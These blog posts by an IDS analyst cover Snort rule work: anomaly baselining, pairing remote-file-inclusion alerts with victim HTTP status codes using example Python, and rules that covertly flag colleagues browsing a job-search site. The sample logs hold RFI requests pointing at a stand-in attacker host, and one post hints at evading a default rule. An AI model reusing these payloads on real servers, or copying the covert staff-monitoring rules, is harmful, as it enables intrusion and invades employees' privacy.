work and IT @ 21 Mar 2008 04:40 pm by ayoi
Suddenly it popped up in my mind. Why? When our researcher asked me to help him gather all available attack packets or traffic for him, I told him that instead of trying to identify/categorize/accumulate/store all the attack traffic in order to understand the attack patterns, why not identify the normal traffic for the monitored segments, so that any significant deviation from this normal traffic can be considered suspicious. Even the main rule of writing Snort rules is to always capture the vulnerability and not the attack tools. The reason? There are thousands of attack patterns for a vulnerability. We can never fully record all the attack methods. It's quite impossible IMHO. And of course there is no way we can identify any 0-dayz attacks if we concentrate on enumerating attacks instead of concentrating on the normal traffic.
One of the ICT Security DUMB ideas in motion I guess..
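As an added example (not code from the original post), here is a small baseline-and-deviation check in the spirit of the idea above: per-window connection counts per destination port on a monitored segment are summarised into a mean and standard deviation, and a new window is flagged when a port's count lies more than a chosen number of standard deviations from its baseline, when a port never seen in the baseline appears, or when a port that is normally busy goes silent. All flow counts are constructed for the example; the 3-sigma threshold and the standard-deviation floor are assumptions, not values from the post.

```python
from statistics import mean, pstdev

# Constructed baseline: one dict per observation window (say, one hour of
# traffic on the monitored segment), mapping destination port -> number of
# connections seen. These numbers are made up for the example.
BASELINE_WINDOWS = [
    {80: 120, 443: 95, 53: 40, 25: 10},
    {80: 110, 443: 100, 53: 38, 25: 12},
    {80: 130, 443: 90, 53: 42, 25: 9},
    {80: 125, 443: 105, 53: 39, 25: 11},
    {80: 115, 443: 98, 53: 41, 25: 10},
]

# Constructed windows to check against the baseline.
NORMAL_WINDOW = {80: 118, 443: 97, 53: 40, 25: 11}
NEW_PORT_WINDOW = {80: 118, 443: 97, 53: 40, 25: 11, 1433: 300}  # a port the segment never used
DNS_SPIKE_WINDOW = {80: 122, 443: 96, 53: 900}                   # DNS 20x normal, SMTP gone silent


def build_baseline(windows):
    """Per-port (mean, population stddev) of connection counts over the
    baseline windows. A port missing from a window counts as zero there."""
    ports = set().union(*windows)
    return {port: (mean([w.get(port, 0) for w in windows]),
                   pstdev([w.get(port, 0) for w in windows]))
            for port in ports}


def find_deviations(window, baseline, threshold=3.0, min_sigma=1.0):
    """Return sorted (port, count, reason) tuples for ports whose count in
    `window` deviates from the baseline.

    - A port absent from the baseline is always reported: the baseline says
      nothing about it, so it cannot be called normal.
    - `min_sigma` floors the standard deviation (assumed value), so a port
      whose baseline count barely varies does not alert on a tiny change.
    - Ports present in the baseline but missing from the window are checked
      too: traffic that stops can be as telling as traffic that appears.
    """
    findings = []
    for port, count in window.items():
        if port not in baseline:
            findings.append((port, count, "port never seen in baseline"))
            continue
        mu, sigma = baseline[port]
        z = (count - mu) / max(sigma, min_sigma)
        if abs(z) > threshold:
            findings.append((port, count, f"z-score {z:.1f} vs baseline mean {mu:.1f}"))
    for port, (mu, sigma) in baseline.items():
        if port not in window:
            z = (0 - mu) / max(sigma, min_sigma)
            if abs(z) > threshold:
                findings.append((port, 0, f"z-score {z:.1f} vs baseline mean {mu:.1f}"))
    return sorted(findings)


def deviating_ports(window, windows=BASELINE_WINDOWS):
    """Convenience wrapper: just the ports flagged for `window`."""
    return [port for port, _, _ in find_deviations(window, build_baseline(windows))]


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_WINDOWS)
    for name, window in [("normal", NORMAL_WINDOW),
                         ("new port", NEW_PORT_WINDOW),
                         ("dns spike", DNS_SPIKE_WINDOW)]:
        print(name, find_deviations(window, baseline))
```

The baseline has to come from a period you have reason to believe was clean, and it needs rebuilding as the segment's role changes; a baseline learned while an attacker was already present simply teaches the detector that the attacker is normal.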
work and IT @ 19 Dec 2007 12:51 pm by ayoi
Yeah, it's fun to write Job street rules, but from time to time I just evaluate the existing rules to identify which ones are suitable for our usage. Ahh, and I did find that the default Web PHP remote include path rule will not be triggered when the html equivalent is used instead of http (one of the contents that will trigger the rule). Of course the targeted server will give a 200 response code when that type of attack is used. Anyway, further POC is needed though, as it's not finalized yet.
Anyway, one of our developers asked me whether attack-response rules can be used to record the victim's response to attacks. I suggested that, in order to at least eliminate the amount of unsuccessful attacks on our clients' assets, what we can do is compare the alerts (attacks) with the response from the victim, which can be derived from their log files. For example, if remote file inclusion is attempted on a webserver, a comparison can be made with the response from the victim via their logfiles. Perhaps it will not be an easy task to perform, but a 200-related response from the victim to any attack can be a good indicator that the command/attempt by the attacker was processed by the victim, while any 400-related response indicates that the attack failed and will not be shown in the SA console (or will have some sort of message saying that the attempt failed, for statistics' sake).
To answer my developer's question, I just implemented the dynamic rules. For a test I just made some modifications to the Web PHP remote include path rule and created one dynamic rule to indicate a 200 response. I do believe this is not a viable option, as we would have to modify all the rules to get this kind of attack-and-response alert.
Anyway, here's the screenshot just for the sake of POC, and I did state in my email to him my thoughts on implementing this method.

Anyway, from the Snort manual it seems that these dynamic rules will be phased out and replaced with flowbits and tagging.
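The alert-versus-victim-response comparison suggested above, as an added example (not the post's rules or screenshots): the script reads Snort-style "fast" alert lines and the victim webserver's access log, pairs each alert with the log entry from the same client within a few seconds, and reports whether the server answered with a 2xx (attempt processed, worth showing in the console) or a 4xx (attempt failed, keep for statistics). The alert and log lines, addresses, hostnames and rule SID are constructed for the example; the year and timezone applied to the alert timestamps (Snort's fast format carries neither) and the 5-second pairing window are assumptions.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample data. The alert lines imitate Snort's "fast" alert
# output and the log lines imitate Apache's common log format; hosts,
# addresses, times and the rule SID are made up for this example.
ALERTS = """\
12/19-12:40:01.123456  [**] [1:1000001:1] WEB-PHP remote include path [**] [Priority: 1] {TCP} 10.0.0.5:43120 -> 192.168.1.10:80
12/19-12:41:15.654321  [**] [1:1000001:1] WEB-PHP remote include path [**] [Priority: 1] {TCP} 10.0.0.9:51002 -> 192.168.1.10:80
12/19-12:42:30.000000  [**] [1:1000001:1] WEB-PHP remote include path [**] [Priority: 1] {TCP} 10.0.0.7:40001 -> 192.168.1.10:80
"""
ACCESS_LOG = """\
10.0.0.5 - - [19/Dec/2007:12:40:01 +0800] "GET /index.php?page=http://attacker.example/x.txt HTTP/1.1" 200 5123
10.0.0.9 - - [19/Dec/2007:12:41:16 +0800] "GET /index.php?page=http://attacker.example/x.txt HTTP/1.1" 404 512
10.0.0.2 - - [19/Dec/2007:12:41:20 +0800] "GET /about.html HTTP/1.1" 200 2048
"""

# Assumed: sensor and webserver share this timezone, and the alerts are
# from this year (the fast format records neither).
ALERT_YEAR = 2007
LOCAL_TZ = timezone(timedelta(hours=8))

ALERT_RE = re.compile(
    r"^(?P<mon>\d\d)/(?P<day>\d\d)-(?P<h>\d\d):(?P<m>\d\d):(?P<s>\d\d)\.\d+\s+"
    r"\[\*\*\] \[(?P<sid>[\d:]+)\] (?P<msg>.*?) \[\*\*\].*?"
    r"\{(?P<proto>\w+)\} (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):\d+$"
)
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def parse_alerts(text, year=ALERT_YEAR, tz=LOCAL_TZ):
    """Parse fast-format alert lines into dicts with an aware timestamp."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if not m:
            continue  # skip anything that is not an alert line
        ts = datetime(year, int(m["mon"]), int(m["day"]),
                      int(m["h"]), int(m["m"]), int(m["s"]), tzinfo=tz)
        alerts.append({"time": ts, "sid": m["sid"], "msg": m["msg"],
                       "src": m["src"], "dst": m["dst"]})
    return alerts


def parse_access_log(text):
    """Parse common-log-format lines into dicts with an aware timestamp."""
    entries = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append({"time": ts, "client": m["client"],
                        "uri": m["uri"], "status": int(m["status"])})
    return entries


def verdict_for(status):
    """Map the victim's HTTP status to the post's two buckets."""
    if 200 <= status < 300:
        return "processed"   # server handled the request: show it to the analyst
    if 400 <= status < 500:
        return "failed"      # server rejected it: keep for statistics only
    return "unknown"         # 3xx/5xx need a closer look before deciding


def correlate(alerts, entries, window=timedelta(seconds=5)):
    """Pair each alert with the victim's log entry from the same client
    within `window` (assumed 5 s) and attach a verdict from the status."""
    results = []
    for a in alerts:
        match = next((e for e in entries
                      if e["client"] == a["src"] and abs(e["time"] - a["time"]) <= window),
                     None)
        if match is None:
            results.append({**a, "status": None, "verdict": "no victim log entry"})
        else:
            results.append({**a, "status": match["status"], "uri": match["uri"],
                            "verdict": verdict_for(match["status"])})
    return results


def analyze(alert_text=ALERTS, log_text=ACCESS_LOG):
    return correlate(parse_alerts(alert_text), parse_access_log(log_text))


if __name__ == "__main__":
    for r in analyze():
        print(f"{r['time']:%H:%M:%S} {r['src']} {r['msg']}: {r['verdict']} ({r['status']})")
```

Pairing on client address and time alone is deliberately loose: behind NAT or a proxy several clients share one address, so in practice the request URI from the alert's payload should be matched against the logged URI as well, and an alert with no log entry at all is worth a second look, since it may mean the request never reached the server or that logging on the victim is incomplete.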
work and IT @ 10 Dec 2007 06:08 pm by ayoi
I think I share the same feeling as Garfield about Mondays. Even though there is paperwork, training slides and of course some write-ups that need my undivided attention, it's kinda hard to kick-start that work ;P (Garfield pic taken from brokencode.biz)
Anyway, during lunch hour I had some discussion about our jobs, the company, our market value etc. with my colleague, whose last working day here will be this Friday. And when talking about new or potential new employers, the word jobstreet was the most said word in that discussion. I have to admit that I do have an account at jobstreet (eventually I've forgotten the login and password; as far as I remember, I registered at that website nearly 7-8 years ago). That's why when somebody called me and said that they got my contact number from jobstreet, I felt a lil bit suspicious.
I do wonder how many ppl from my company access that website. My colleague suggested writing Snort rules to detect that particular activity. It's for our own usage, not for reporting to mgmt or anything like that. Anyway, we just implemented that rule on our external sensor and of course the rule was removed after one day.
(~DISCLAIMER~ I do not condone/promote/agree on breaching users privacy)
So below are the screenshots from my Sguil. I've tested the rules on my machines, so both of the IPs shown belong to my machines.

New Job Seekers Detected – jobstreet.com.my

New Job Seekers Detected – myjobstreet accessed
p/s: I will not publish the rules btw. I know it's easy to write those rules, but you have to work it out yourselves, as I know that there are companies which prohibit their employees from surfing that kind of site.